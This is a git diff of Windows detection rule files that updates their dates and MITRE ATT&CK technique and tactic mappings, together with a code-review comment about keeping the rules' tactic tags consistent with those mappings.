Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml index df5ba00f618..ab9056795e5 100644 --- a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml +++ b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -170,41 +170,61 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.001" +name = "Logon Script (Windows)" +reference = "https://attack.mitre.org/techniques/T1037/001/" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1547.004" +name = "Winlogon Helper DLL" +reference = "https://attack.mitre.org/techniques/T1547/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_webshell_detection.toml b/rules/windows/persistence_webshell_detection.toml index 9999667d1d4..133006547ec 100644 --- a/rules/windows/persistence_webshell_detection.toml +++ b/rules/windows/persistence_webshell_detection.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/08/24" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/01/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -153,35 +153,38 @@ value = "*?:\\\\Program Files (x86)\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" + [[rule.threat.technique.subtechnique]] id = "T1505.003" name = "Web Shell" reference = "https://attack.mitre.org/techniques/T1505/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -191,6 +194,7 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -206,14 +210,15 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line"] 
diff --git a/rules/windows/persistence_werfault_reflectdebugger.toml b/rules/windows/persistence_werfault_reflectdebugger.toml index 10b36a1c675..fe4ec754836 100644 --- a/rules/windows/persistence_werfault_reflectdebugger.toml +++ b/rules/windows/persistence_werfault_reflectdebugger.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,26 +89,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.012" +name = "Image File Execution Options Injection" +reference = "https://attack.mitre.org/techniques/T1546/012/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_credroaming_ldap.toml b/rules/windows/privilege_escalation_credroaming_ldap.toml index 50b903484bb..27303266a55 100644 --- a/rules/windows/privilege_escalation_credroaming_ldap.toml +++ b/rules/windows/privilege_escalation_credroaming_ldap.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -98,14 +98,18 @@ event.code:"5136" and host.os.type:"windows" and winlog.event_data.AttributeLDAP [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_disable_uac_registry.toml b/rules/windows/privilege_escalation_disable_uac_registry.toml index 8d113e3b967..dc3a6bd371b 100644 --- a/rules/windows/privilege_escalation_disable_uac_registry.toml +++ b/rules/windows/privilege_escalation_disable_uac_registry.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -113,51 +113,41 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml index b68b5bdb6c1..b86726f75eb 100644 --- a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml +++ b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/23" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -61,27 +61,44 @@ event.code:5137 and host.os.type:"windows" and winlog.event_data.ObjectClass:"ms [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" reference = "https://attack.mitre.org/techniques/T1078/002/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" + +[[rule.threat.technique.subtechnique]] +id = "T1136.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1136/002/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserName"] diff --git a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml index 45a02549dbd..7f8f269e82d 100644 --- a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml +++ b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
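Review bot: The new `[[rule.threat]]` entry for `TA0003` Persistence is added without any visible change to the rule's `tags` array, which sits earlier in the file outside this hunk; the `Tactic: ...` tags are expected to mirror the tactics in `rule.threat`, so this rule should also gain `"Tactic: Persistence"` or the tag consistency check will report it as missing. The same follow-up applies to every hunk in this diff that introduces a tactic — privilege_escalation_dns_serverlevelplugindll.toml (Execution and Persistence), privilege_escalation_group_policy_iniscript.toml (Persistence), privilege_escalation_installertakeover.toml, privilege_escalation_printspooler_registry_copyfiles.toml and privilege_escalation_printspooler_suspicious_file_deletion.toml (Defense Evasion), privilege_escalation_reg_service_imagepath_mod.toml (Persistence) — and in the opposite direction to the hunks that drop the Persistence entry (privilege_escalation_lsa_auth_package.toml, privilege_escalation_persistence_phantom_dll.toml, privilege_escalation_port_monitor_print_processor_abuse.toml), whose existing `"Tactic: Persistence"` tag would become an orphan. The tags are not visible from these hunks, so this may already be handled in lines outside this view.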
@@ -82,14 +82,39 @@ any where host.os.type == "windows" and event.category : ("library", "process") [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/privilege_escalation_driver_newterm_imphash.toml b/rules/windows/privilege_escalation_driver_newterm_imphash.toml index cec1e42a855..1c167c67958 100644 --- a/rules/windows/privilege_escalation_driver_newterm_imphash.toml +++ b/rules/windows/privilege_escalation_driver_newterm_imphash.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/19" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -118,34 +118,44 @@ event.category:"driver" and host.os.type:windows and event.action:"load" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["dll.pe.original_file_name", "dll.code_signature.subject_name"] diff --git a/rules/windows/privilege_escalation_expired_driver_loaded.toml b/rules/windows/privilege_escalation_expired_driver_loaded.toml index d96ccf10bfe..cf2760676b2 100644 --- a/rules/windows/privilege_escalation_expired_driver_loaded.toml +++ b/rules/windows/privilege_escalation_expired_driver_loaded.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -75,31 +75,41 @@ In Windows environments, drivers facilitate communication between the OS and har [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.002" +name = "Code Signing" +reference = "https://attack.mitre.org/techniques/T1553/002/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_exploit_cve_202238028.toml b/rules/windows/privilege_escalation_exploit_cve_202238028.toml index 7ce5473206a..4d153d83157 100644 --- a/rules/windows/privilege_escalation_exploit_cve_202238028.toml +++ b/rules/windows/privilege_escalation_exploit_cve_202238028.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -102,26 +102,36 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.010" +name = "Services File Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/010/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml index 83c8fad1aea..447985003d7 100644 --- a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml +++ b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -90,36 +90,46 @@ file where host.os.type == "windows" and event.type != "deletion" and event.acti [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.001" name = "Group Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/001/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/privilege_escalation_group_policy_iniscript.toml b/rules/windows/privilege_escalation_group_policy_iniscript.toml index 1c705e82d44..bb2e22b742f 100644 --- a/rules/windows/privilege_escalation_group_policy_iniscript.toml +++ b/rules/windows/privilege_escalation_group_policy_iniscript.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/08" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -121,24 +121,36 @@ any where host.os.type == "windows" and event.code in ("5136", "5145") and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.001" name = "Group Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/001/" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/privilege_escalation_installertakeover.toml b/rules/windows/privilege_escalation_installertakeover.toml index 52bf1177ba3..70c6969235e 100644 --- a/rules/windows/privilege_escalation_installertakeover.toml +++ b/rules/windows/privilege_escalation_installertakeover.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -143,14 +143,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml index 337b065f9c5..d0e2f4e4fde 100644 --- a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml +++ b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/04/27" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -89,31 +89,36 @@ sequence by winlog.computer_name with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/privilege_escalation_lsa_auth_package.toml b/rules/windows/privilege_escalation_lsa_auth_package.toml index 24dcc87b0fe..c66cc222bb1 100644 --- a/rules/windows/privilege_escalation_lsa_auth_package.toml +++ b/rules/windows/privilege_escalation_lsa_auth_package.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -79,36 +79,18 @@ The Local Security Authority (LSA) in Windows manages authentication and securit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.002" -name = "Authentication Package" -reference = "https://attack.mitre.org/techniques/T1547/002/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/privilege_escalation_named_pipe_impersonation.toml b/rules/windows/privilege_escalation_named_pipe_impersonation.toml index 17355c1cbf2..2cfed3e6651 100644 --- a/rules/windows/privilege_escalation_named_pipe_impersonation.toml +++ b/rules/windows/privilege_escalation_named_pipe_impersonation.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -135,14 +135,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_persistence_phantom_dll.toml b/rules/windows/privilege_escalation_persistence_phantom_dll.toml index 4cc497eaafe..ac568a9852b 100644 --- a/rules/windows/privilege_escalation_persistence_phantom_dll.toml +++ b/rules/windows/privilege_escalation_persistence_phantom_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/01/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -151,53 +151,36 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml index e4d788cb975..b81fb1bf61d 100644 --- a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml +++ b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/02/25" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -83,10 +83,12 @@ Port monitors and print processors are integral to Windows printing, managing da [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.010" name = "Port Monitors" @@ -97,31 +99,7 @@ id = "T1547.012" name = "Print Processors" reference = "https://attack.mitre.org/techniques/T1547/012/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.010" -name = "Port Monitors" -reference = "https://attack.mitre.org/techniques/T1547/010/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.012" -name = "Print Processors" -reference = "https://attack.mitre.org/techniques/T1547/012/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/privilege_escalation_posh_token_impersonation.toml b/rules/windows/privilege_escalation_posh_token_impersonation.toml index 0d2a820a60c..0662fe27d5b 100644 --- a/rules/windows/privilege_escalation_posh_token_impersonation.toml +++ b/rules/windows/privilege_escalation_posh_token_impersonation.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/17" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -162,44 +162,49 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] id = "T1134.001" name = "Token Impersonation/Theft" reference = "https://attack.mitre.org/techniques/T1134/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - [[rule.threat.technique]] id = "T1106" name = 